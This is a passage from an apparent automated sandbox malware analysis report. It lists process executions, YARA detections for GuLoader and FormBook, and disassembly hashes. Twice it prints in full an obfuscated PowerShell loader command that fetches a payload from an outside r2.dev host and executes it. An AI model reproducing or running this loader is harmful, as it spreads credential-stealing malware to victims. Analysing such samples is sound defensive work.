SubtleIColonopS TrodsetSid temrlic enniEndivieEPaategnScolloqu)Mopishn ');Optllingslister (Spdbarnsplejerens 'Brugers$ZonelovgBe,bexkL B.achioR ssifybDutchamaP,etiskLGelati :Photoc FKrymmelOByggereRDitrochTgu denbi nailheDKinetog=Tilkald$ConsumeGMastereANewsletrBehandlN Skiferi Elekt s UnsmitOStrygejN ChaconeSe,vforROrganisebe,edneS ordski.VatnissS TranspuOpank iB enmandSbunkrettReben eRIndgnidIForskniN concouGTa dlge(Obsidia$PiouslyDEnc opaE robespf ProfesEUstori.nBystecrSNachitoiGennemfBFlommenLPolsterEC.seloa,D sfati$CenterlCTrykmaaL T kninOK.smiskYKdehandmSustente lsriv,N S uamutTilnavn1 Uov rt1clin me2Airtigh)gispede ');Optllingslister $fortid;"
                                          Imagebase:0x7ff788560000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1862118797.0000020AF32F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:5
                                          Start time:08:49:42
                                          Start date:05/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:6
                                          Start time:08:49:51
                                          Start date:05/10/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Lediggang Graadighedens Disciplineringer Bagermestrene Teutonisk Uptilt #>;$Spegeplserne='Nymaledes';<#Messiness Compromising Anaphalis Gennemarbejdelsen Fodervikkerne #>;$Laparotomize140=$host.'PrivateData';If ($Laparotomize140) {$Trikotagefabrikker++;}function Spdbarnsplejerens($Ledningernes){$Annelism=$Totlafholdenhed61+$Ledningernes.Length-$Trikotagefabrikker; for( $Omgik=7;$Omgik -lt $Annelism;$Omgik+=8){$Methodisers='Exuscitate';$Protaspis+=$Ledningernes[$Omgik];$Newsroom204='Dkfjers';}$Protaspis;}function Optllingslister($baulky){ & ($Unark) ($baulky);}$Steamboating=Spdbarnsplejerens 'MouthfuMDecollaoUarb,jdzRaabaaniUdf ldelundertilAntipreaNebra.k/Averrab5stedbrd.Faglrer0 Ful,vr Blottel(Porch dWB taliniAfgangsnRati,nedPopuliso Ove clwAllokatsBegnawn HjertebN Kal etTTempl r Materia1Haunche0Waylanr. instit0Gri tmi;Departe c araciW,uccubei.aftkjonandest 6Eardro 4 Increa; Delege Finansrx Uterom6 mysti 4Fgtmedd;a,reste barramurMacroptvKonvolu:Re ligh1 Graph 2Argenti1Delubru.Apace a0Bebutto)Lystbaa unquietG Spelmae TwelfhcAttak ekSkamrdmoQuantis/Persona2Hemidom0Noggkas1 Nonchr0,anebry0Jaszmal1Futu is0Ud lugt1 Arquat BararmFLikenesiQuizzysrIchthyoeLuncherfOzoniz.oRaastofx.hefmgl/Gra,bea1Aym sar2 Fje,ne1.ongrat.Andelss0No merc ';$Railcard=Spdbarnsplejerens 'syltdepuSoapfissdkningsESvartidRRidning- Er,rinA PainkigOverophE GustinN NegatiTForkerk ';$Ekspatrieret=Spdbarnsplejerens 'Bille thG,ilingtThrenodtBibliotpNonevilsSkydere:Evangel/ mpetu/ Fili,tp DatostuSpecialb Blomme-Tremour2pladshof Achi l7Nipsetsd Quater0 upersu7gagered1Vgtford5 Repr.f3,nakepreGreeneraHousefl1ev kost4 B.odsp0Moduler3Ansamle1Jengene8Sockhea4 leopardStengun6Bioscie2Tonikum2U,ifiab6Skammel6Litigatd Ind kr9unperv.cAfisnin2Regiona8theodraeAngolan4S hoolb1 Thelyt. StavnsrTeleotr2T pefli.drmmebid ConspieMicrotovTopchef/UdlistnnTaagetmePennyspdDr gbolkRiddersoTrvlerng KrgendeRecan.e. betacim Kruspes DeadmeoHusass ';$Overrigidness=Spdbarnsplejerens 'Soapyre>Indsnus ';$Unark=Spdbarnsplejerens 'Terningi,vergeneSlank ixKaosets ';$Metaprescutum='Caddises';$Arkivskab='\Nationalsocialisternes.Ska';Optllingslister (Spdbarnsplejerens 'Uhjlpso$BepaidlgBetali lRea izaoDisser,bEspartoATyr fgtlKlderen:Cebid nm ogejome S ppreKPapembaa Oblig.NklinikliBankemaShaplontMo dsgnieFinlandRHenns.n= N.trog$ ego,seEPlasmasn.ultideVIllegit:Bu.kladApel,rgoPRakitispQuincyuD GuidebA antasiTThomisiAUnhands+wasabis$Racial,aN nsurgRUnmercekForsortiDolomitVAmn,monS Et,opikBulwarkAPungpebbBowkerb ');Optllingslister (Spdbarnsplejerens 'Excla,m$KronpriGOpvaskelStumbleO otulisB Forma,aSulfosrLDiscolo: NightiITendo.oNUnwiseqd Libra i BesselSpakhusetWindburi PneumoNE,rthwacAdaptivtAgranulNFlambeeESlingreSAnnot tsUdv elg= Orchit$UncapiteLinj,skKReflektsBleeralPEnta glAKannikkTBedstevRIagttagiSnotdumEnabofamrnostalgePara.phTAcrolog.Reak orSB listip pologeLRhipidoI esidenTDonnere(Hematoz$zenithwoRadiofrVEmpireneMilieufr Dknernr TeaktriBogsideGMercha i SnudesDMytedanNGruppereYoyoentSDisapprSReolplo).nravel ');Optllingslister (Spdbarnsplejerens '.ortuga[ lucan nsa irisETftestitMe lemr.Towns dSbreakb eSstvl rRCentralV,ndskriiIndophicBisae teS kkatipPap rweoSemidanISultestNOpfindetReprsenmOatearpaunepaulNEq iglaaInteraggNi.eaufeViablybRchar ae]Dichot.: Fea,an:tmrerlrS S anniEAlrune cFractiouProgramr MancheI Predebt Re oluydysphorpComelierDeflatioOppostiTKvgsakso P.eudoCKildeskoPladsbiLAar ang C elat=Ansgnin Uforbed[AndrikkNHygroskEParoemitAfdmpes.arbitrasEclegmeeCitatorC ropageuEmulsi RCh mistIBrickseT,elvklaYFaithfupEpinikiRS athelO dblsniTTeleslyoChestercunopposOAdoratol Heor ot RangewyFoolheaPbur houEAbseyhe]Linkedi: ,otiva:ReinvesTMicrospL GlyptoSFr stde1Rottegi2 Proje ');$Ekspatrieret=$Indistinctness[0];$husholdningsskoler=(Spdbarnsplejerens ' Gra.te$ PericaGJomfrubLHvelsenoGringssbCyklista Mis.ieL Affald: G dssau .ooteeNUd revnSMjavendh EtagelOFeltrkkuCentenilPleisefdUnluckiESerfsocRPackth.=SmaapennSporrenerigdo,mWbiopsie-,ukkerso Forhanb ForereJVrke miE HonnrrcLaborabtN nconv Hvlb,kesAflggery ForskaSFurfur,tDustragEVirussymGlucina.ChammieNDesigneeCae ardtRanker .LatticewRhi.enceTotalfobBagstrvcStai liLT.ltstaIAadredeEHiberninbun onutTweedja ');Optllingslister ($husholdningsskoler);Optllingslister (Spdbarnsplejerens 'Noncabi$ errariUSmrb omnPenitensaeoliavh Exter.oFourberuRational Diff.sd MishmeeTungsdyr Koordi.CrackjaHTileworeunitageaKlovbredInkpotse Yank erperceivs Jagtle[ udkaar$Newsm nRafgiv saVaarbe,iBrevposl BagtjecUnmodifaPes nterDriftstd Afsvid]Pi,dest=Tiercer$DementeSPreceptt ungetseUd.elhea Cor.hamSlipo tbSkydemooTeknoloaHypercat Te.nfei KotypenTippesggBeelb,w ');$uninverted=Spdbarnsplejerens 'Uansvar$ y.mygeURedescenCryptsbs Bo boihFjordmuoCult,rouIslamabl NeurocdBrotfore Opvi,lrIldfuld.galpedeDSnaskedoEmero swUundvrlnUlg,liglLapindeoDor micaMi,parsdtelomitF UnfiltiSkudfrilBenzog eCont ai( .rithl$IncarnaEAdffrozkNonre lsHeretripLefleroaendestat saltsgrAdgangsiSigjnereRedoingrudrangeeHarringtTo alfr,Unimp w$VragdelFLavtrykr.ubtruneKatteurm Svrm,ttHvidtlpo Uncoven Bre aaiHjpand n SkattegSubrepte ravebrrProconsnCatty he Blo.sosAb ulla)Dismali ';$Fremtoningernes=$Mekanismer;Optllingslister (Spdbarnsplejerens ' M ligg$DatolinGEsc rtaLRedugnyoDvrgtrebMosfeteaHydrophL Cresco:Unblockr AtlassEHaandvrCWoadwaxk aakesfu Mocamb=Talomr (RentegntRatevise H mmelsBar,uesTProphet-FormandP ForgemaGer niotFngselshKolofon Faneb a$MenagerFOutvo.erSalgsenEDia,reemEffektsTimitateo tomiseN Uduelii SupersNIr quoig PaaregeCharcutRLotu.blNKapelkue U viklsInappea)Craftsp ');while (!$Recku) {Optllingslister (Spdbarnsplejerens ' Forhaa$ nakewigPa eondlHaarskmo Lovfs,b D,lstraun ompolStor og:NeighboBBrnehavrFlygtnio EnogtylPh tohabRouma i=Tra sse$BoligkotChaouaurRedninguUnsysteeGranit ') ;Optllingslister $uninverted;Optllingslister (Spdbarnsplejerens 'c,ndemnsDerm,toTCutweedA PalterrRaketteTSlutbem-Boremusskl,ringl NoaordE Microme.okalplpO ybuty c,ment4Homosty ');Optllingslister (Spdbarnsplejerens 'Vegeter$ RemplaGNo jesolRaceadsoFinu.libLgebesgACebida lBou bak:OpregulR oorepoEPalaeotCKoteriokElevatoURioting=Stamper(UnsancttVit eoue s henesKa tepotJehov.c-Muddin.P Babirua sk vritAigretsHU locom Uncoher$SanenesFKrigshurTransmueMooningm PoikiltDolcinooLiljasgnB dkninI supranNGliblymgStrsteveCokingpr GynandNBetydeteBefstenSRinkens)Nationa ') ;Optllingslister (Spdbarnsplejerens 'Kla seb$Tir desGjrlislulGeniohyORiko.heBskjaldeaSiccarsLValgkam:O havsrP Pra esrQuinqueeU trustl SvejseUBetv.ngxIns uciuTightlirNonin eISem conoserbokru,inkendsCorabe.NN,teforesu afflstheriomsYndeful= Svejst$ hypogegJunetteLSolbrroO tsarkoBBestyreA Baldu.LJaspopa: KetchuFstromatL retsreJ Apolunl PrehalSMateriaBMixy kolhvepse dSprjteneGelidiaSUnctori+ umiste+,lteleg%Fo hand$Rejser IAfdkke,NAnchoriDS,licifI Fis,eps Tilke.tStudepriSmu stiNFadtc,ccTrocharTT anspinDeturreeInvariaSTiberbrsA terud.SupranaCUngdomyoDandyliUMglin.sNUnontolTUligevg ') ;$Ekspatrieret=$Indistinctness[$Preluxuriousness];}$Defensible=328477;$Cloyment112=33710;Optllingslister (Spdbarnsplejerens 'Forsmme$KriminagTahl anlKlippenOtedeumeB SnusetAfornuftl Shastr: Z motiROchersaEHempherN vandskTBronzese JubiluN Kodakse EkstraDskibsllSdionas tAnprisnTSprgepaEMyelapoL Sarde.SOculoc,eArmbroeNInt iga Dentif= Spilde Dygt gegPhthorfESkbnernTReallns-KursusmC Affe toAnskaffNAlienedtForkramEEchiurinOrganistGlanspa Festone$OuttravfMis nfoRProcam E TumbleMSkyggebtRisti.goReacha.NLaughi.iDivisilN rinserGBin ehiEGodkendRprovsteNPsywarsE Unsup SDena io ');Optllingslister (Spdbarnsplejerens ' Sphagn$Regle sgEyasesfl HeterooFarsalab ImportaGibbo.el By one:SluttisCLiltinghSknsv seGthedspmHensaasiForha nsDeafenetImma rirSmrgaasiMorgenbe Hilstesunfavor Sjufte= Repeti Kollabo[ DampruSFarvenhymiranhasFortrdetMalereee Stikpim Impreg. Sekte CSamfundoNonsympnKartot,vtomatrdePredaylrTarradit aimio] Mller.: enerva:KlevareFtro ddorOphthaloSpurioumAc puncBVaabensaTykmlkssSekund eStensto6Sluggar4FremstdS coit ot BobsldrUdstykni Waterwn,vrdfstgDiakoni(Afgang $TetrachRPostnumeChecksunjal.usitKlokkereTarriarnRegionaeOpmagasdSuccesssM,sfarvtCirkulrtEpimer eBlegekrlPrveb lsStrutteeRkvrkernOrganis) Oransa ');Optllingslister (Spdbarnsplejerens 'Leafenr$ SortergBenignal Hfe teoBal.onfBScentleA.drtspalDygtigt: Cura,iG CataraaMadcapsRnonexhiNDua iteimasseprsbe,adtaO AmilkanS mleobeCr.ftswr MarielErffelscsAfprvni A,sorp= orcer Napoleo[A lagteSBaga ebY s rongStotalitT S bsideCorrodamStreg a.Undg detHel,ogretambukixPrepareTAkkiles.Forbru eSkvis.nNMobilesc JenvipOBetrenddR.gmelsIFis.ureNSteriliGRe teno]Vandrep:Skadesl:Pa affiAWhizzerSDinoflac MusikliAbbreviiafgangs.ChestinGDiagnosE SeralbTDaggersS mult vt FrerbeRDegageri AfmattNDomstolgHa glin(Deflati$Trringec GuldfihStereo,eansvarsm SubtleIColonopS TrodsetSid temrlic enniEndivieEPaategnScolloqu)Mopishn ');Optllingslister (Spdbarnsplejerens 'Brugers$ZonelovgBe,bexkL B.achioR ssifybDutchamaP,etiskLGelati :Photoc FKrymmelOByggereRDitrochTgu denbi nailheDKinetog=Tilkald$ConsumeGMastereANewsletrBehandlN Skiferi Elekt s UnsmitOStrygejN ChaconeSe,vforROrganisebe,edneS ordski.VatnissS TranspuOpank iB enmandSbunkrettReben eRIndgnidIForskniN concouGTa dlge(Obsidia$PiouslyDEnc opaE robespf ProfesEUstori.nBystecrSNachitoiGennemfBFlommenLPolsterEC.seloa,D sfati$CenterlCTrykmaaL T kninOK.smiskYKdehandmSustente lsriv,N S uamutTilnavn1 Uov rt1clin me2Airtigh)gispede ');Optllingslister $fortid;"
                                          Imagebase:0x140000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2059188423.00000000085C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2059480573.000000000CD15000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2043963608.0000000005918000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:7
                                          Start time:08:49:51
                                          Start date:05/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:11
                                          Start time:08:50:11
                                          Start date:05/10/2024
                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\syswow64\msiexec.exe"
                                          Imagebase:0x9b0000
                                          File size:59'904 bytes
                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2543568933.0000000024700000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2543568933.0000000024700000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2544153499.0000000024B70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2544153499.0000000024B70000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:12
                                          Start time:08:50:52
                                          Start date:05/10/2024
                                          Path:C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe"
                                          Imagebase:0x930000
                                          File size:140'800 bytes
                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2955148766.0000000002D00000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2955148766.0000000002D00000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                          Reputation:high
                                          Has exited:false

                                          General

                                          Target ID:13
                                          Start time:08:50:54
                                          Start date:05/10/2024
                                          Path:C:\Windows\SysWOW64\msinfo32.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\msinfo32.exe"
                                          Imagebase:0x270000
                                          File size:338'432 bytes
                                          MD5 hash:5C49B7B55D4AF40DB1047E08484D6656
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2955140831.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2955140831.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2955249123.0000000004C30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2955249123.0000000004C30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          Reputation:moderate
                                          Has exited:false

                                          General

                                          Target ID:15
                                          Start time:08:51:08
                                          Start date:05/10/2024
                                          Path:C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe"
                                          Imagebase:0x930000
                                          File size:140'800 bytes
                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2955372386.0000000002BD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2955372386.0000000002BD0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          Has exited:false

                                          General

                                          Target ID:16
                                          Start time:08:51:20
                                          Start date:05/10/2024
                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                          Imagebase:0x7ff6bf500000
                                          File size:676'768 bytes
                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Disassembly

                                          Reset < >

                                            Executed Functions

                                            Function 00007FFD9B97A21A Relevance: .6, Instructions: 557COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1876818148.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b970000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7fe1a7e28190ba84e9ecfa6ce7a37ddf67e0ac8d6b86700f884bb8c973f3dbdc
                                            • Instruction ID: 5ce40aac0cc86f45b6c237a3c8a211c2808ea87767b01d3185e7f70a68d85cda
                                            • Opcode Fuzzy Hash: 7fe1a7e28190ba84e9ecfa6ce7a37ddf67e0ac8d6b86700f884bb8c973f3dbdc
                                            • Instruction Fuzzy Hash: 04024922B1FBC91FE7669B6848A51647BE1EF96220F1901FFC09CCB1E3DE196C458742
                                            Function 00007FFD9B8AC022 Relevance: .5, Instructions: 464COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1876125725.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b8a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ed2ebdd6377d3fc80beb80adbee09647ae413f4ffb142d4f62805fa5a61bbe35
                                            • Instruction ID: 623a1fb4839ec6c1061929b045b38960b00113deb750e1e0483493df520e36f8
                                            • Opcode Fuzzy Hash: ed2ebdd6377d3fc80beb80adbee09647ae413f4ffb142d4f62805fa5a61bbe35
                                            • Instruction Fuzzy Hash: 65E1B430A09A4E8FEBA8DF68CC657E977D1FF58310F04426ED84DC72A5DE7499418B81
                                            Function 00007FFD9B8AB2BF Relevance: .4, Instructions: 445COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1876125725.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b8a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a59d72a9d040ea2eb3b2f5da977483e17a0be0b479fe681d26f63ea0820588b2
                                            • Instruction ID: cb279f322c427062f58215614e0cdf3aadd57de616e4614faf973bcdeb7bbdca
                                            • Opcode Fuzzy Hash: a59d72a9d040ea2eb3b2f5da977483e17a0be0b479fe681d26f63ea0820588b2
                                            • Instruction Fuzzy Hash: EAE18230A09A4D8FEBA8DF28D865BF937D1FF58310F00426EE85DC7295DB34A9458B81
                                            Function 00007FFD9B9792E7 Relevance: .9, Instructions: 872COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1876818148.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b970000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3f2442a25bdaef2742989372a2678dd3bb7c1d2b61f69b0b0ee9774592d6c3f8
                                            • Instruction ID: c8878855ad18897a858c61e5abe57d9f343e283ea941d2843e9f276c54f7f4e7
                                            • Opcode Fuzzy Hash: 3f2442a25bdaef2742989372a2678dd3bb7c1d2b61f69b0b0ee9774592d6c3f8
                                            • Instruction Fuzzy Hash: B7520732A0F7C92FE766976C48A95A47BE1EF53214F1901FEC09CCB1E3D919A846C352
                                            Function 00007FFD9B8AE515 Relevance: .7, Instructions: 678COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1876125725.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b8a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ac61cbbcb6ea4100481eca26adb220fdaa2af88842530f0815d9efb53312d65a
                                            • Instruction ID: 4f7c07da00957c5b519a92467dd0960355061c5d4758de3b3791e6be7263b6b1
                                            • Opcode Fuzzy Hash: ac61cbbcb6ea4100481eca26adb220fdaa2af88842530f0815d9efb53312d65a
                                            • Instruction Fuzzy Hash: 17329430A18A4D8FDF98DF98C4A5AA977E1FF58301F24056AE009D7695DB35F841CB81
                                            Function 00007FFD9B974789 Relevance: .5, Instructions: 549COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1876818148.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b970000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cb2f3c34fb421b35d8d8cf6943eac54db6c2a7ac7ce48598e194ee69f71ba4e6
                                            • Instruction ID: 9966ca61cf65affc7478e0b1194c4d442230bc6cf15d06872cb7aa1137e5115d
                                            • Opcode Fuzzy Hash: cb2f3c34fb421b35d8d8cf6943eac54db6c2a7ac7ce48598e194ee69f71ba4e6
                                            • Instruction Fuzzy Hash: EFF13B22B1FBCA1FE76A977858B56B87BD1DF52610B0A01FFD099C72E3D9086C058351
                                            Function 00007FFD9B97AA9B Relevance: .5, Instructions: 500COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1876818148.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b970000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cf39a177f19da3f9a6d5ff9a6ff4fcd9298e8c70233db09d6957a72b2bd3570e
                                            • Instruction ID: 3fe0127607dca4e51b12fc17999013c733c130abcdac6706f76e0a11dae44ec4
                                            • Opcode Fuzzy Hash: cf39a177f19da3f9a6d5ff9a6ff4fcd9298e8c70233db09d6957a72b2bd3570e
                                            • Instruction Fuzzy Hash: C3F13722B1EB8E1FE7699B6848A56787BE1EF55310F1901FED05CCB1E3DE18AC458342
                                            Function 00007FFD9B979DEF Relevance: .4, Instructions: 429COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1876818148.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b970000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a031f929a53f2bed076b93e1fa6b3d5145e2e25207a2c967fafc2c53805757fd
                                            • Instruction ID: d3cb58c7e7820da92ed8652f382697cc684c71bd06c054da2d2fae8f978a8067
                                            • Opcode Fuzzy Hash: a031f929a53f2bed076b93e1fa6b3d5145e2e25207a2c967fafc2c53805757fd
                                            • Instruction Fuzzy Hash: 81C13622B1EB8D5FEBA6DAAC48A45B47BE1EF56310B1901FBD04CCB1E3DD14AD458381
                                            Function 00007FFD9B97572D Relevance: .4, Instructions: 388COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1876818148.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b970000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 13dad60f3e8f368a3ac0f80fbbea3b7c874ccb22c69e054ab14db8bee2b1d9ec
                                            • Instruction ID: 9e2d7988208ffa02ea59f7d1658aa847293cfcdb6ccacffdcf7ee5b9384a528b
                                            • Opcode Fuzzy Hash: 13dad60f3e8f368a3ac0f80fbbea3b7c874ccb22c69e054ab14db8bee2b1d9ec
                                            • Instruction Fuzzy Hash: A0B14822B1EB9E5FEBE59B6C58A45B47BD1EF56220B0901FBD04CCB1E3DD18AD058341
                                            Function 00007FFD9B8ABC36 Relevance: .3, Instructions: 337COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1876125725.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b8a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 71a90996fca477f148468143899b3cd89a878cac2b304db5b8e5761a3463a530
                                            • Instruction ID: d6aaaa56a22eb46600f2e7d91d71b137b4ce9465afa430dfbcdc405ef33cf91a
